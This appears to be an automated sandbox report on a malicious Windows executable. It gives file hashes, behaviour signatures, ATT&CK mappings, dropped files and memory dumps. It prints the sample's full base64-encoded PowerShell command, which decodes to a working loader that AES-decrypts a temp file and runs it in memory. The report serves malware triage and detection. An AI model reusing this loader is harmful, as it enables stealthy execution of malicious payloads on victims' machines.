b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212

General

Target

b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe
Size

986KB
MD5

4d69a6b1a835e13d9399fc7a3fcd1c7f
SHA1

dabeb84fb579d1b1fd8efffd3f75ec5e5d5c6297
SHA256

b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212
SHA512

01900903b402511922c3d3a3eac3b217f49c19e6f245ac250f01614cc3b7f89975f412a96c648c48c8b1641cf5af61707d0261f4656ce48f3a8739436102d59b
SSDEEP

12288:67t9TgXF/OHYMhHQy9J9cv2N3TApMDcMs9cs46uxDscaK7JGfhJef98WXRAEz1T+:67btH9iyd90pMDRRuvQJKQfGwaERT5E

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2176 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2176 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2176 powershell.exe

pid	process
2176	powershell.exe

pid	process
2176	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2176	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe

description	pid	process	target process
PID 1972 wrote to memory of 2176	1972	b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe	powershell.exe
PID 1972 wrote to memory of 2176	1972	b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe	powershell.exe
PID 1972 wrote to memory of 2176	1972	b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe
"C:\Users\Admin\AppData\Local\Temp\b0abe21d655ad2ec0d295ea225a0609350d399ffe916f8880b0e66d7d360e212.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADYAOAAsACAAMAB4ADYANwAsACAAMAB4AEIARQAsACAAMAB4ADcAQQAsACAAMAB4ADIAMwAsACAAMAB4ADUAOQAsACAAMAB4ADAAMQAsACAAMAB4ADcAQgAsACAAMAB4ADEAOAAsACAAMAB4AEMANwAsACAAMAB4AEUANwAsACAAMAB4AEYANgAsACAAMAB4AEYAMgAsACAAMAB4ADUARAAsACAAMAB4ADEAMwAsACAAMAB4AEEAMgAsACAAMAB4AEMANwAsACAAMAB4ADQAMAAsACAAMAB4AEEARQAsACAAMAB4AEEANwAsACAAMAB4ADMAMwAsACAAMAB4AEQAQQAsACAAMAB4ADYAOAAsACAAMAB4ADAAOQAsACAAMAB4ADYANAAsACAAMAB4ADYANQAsACAAMAB4AEEAOAAsACAAMAB4ADAAQgAsACAAMAB4ADAAMgAsACAAMAB4ADAARQAsACAAMAB4ADQANAAsACAAMAB4ADYAQwApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0ADUALAAgADAAeAA1AEUALAAgADAAeAA2ADEALAAgADAAeAA3ADQALAAgADAAeABBADgALAAgADAAeAA4AEMALAAgADAAeAAwADUALAAgADAAeAAzAEMALAAgADAAeAAzADYALAAgADAAeAAzADcALAAgADAAeABCAEMALAAgADAAeAAxADMALAAgADAAeAA4AEYALAAgADAAeABCADMALAAgADAAeAA2AEMALAAgADAAeAA4AEEAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-21018.putik

Filesize
33KB

MD5
7bcc1c9dcb3f70c39e7c0ba4af126a17

SHA1
8f03d5db806837d8c6d7d1de7288ab053c906bd0

SHA256
3c6163c8469b5df10422d7578e276b44cfb2b18e3c19cb09303dd1a4864435bf

SHA512
537ce66f91aeda2b66495857434900a2040008c466764ad50f07515c137f3a5502c2a079a8d72ae49651f238869ef55005a3229e226c141ba01713e39eac3d3a

Download Submit
memory/2176-5-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp

Filesize
4KB

Download
memory/2176-6-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2176-7-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2176-8-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2176-9-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2176-10-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2176-11-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2176-12-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download
memory/2176-14-0x0000000002B70000-0x0000000002B7C000-memory.dmp

Filesize
48KB

Download
memory/2176-15-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing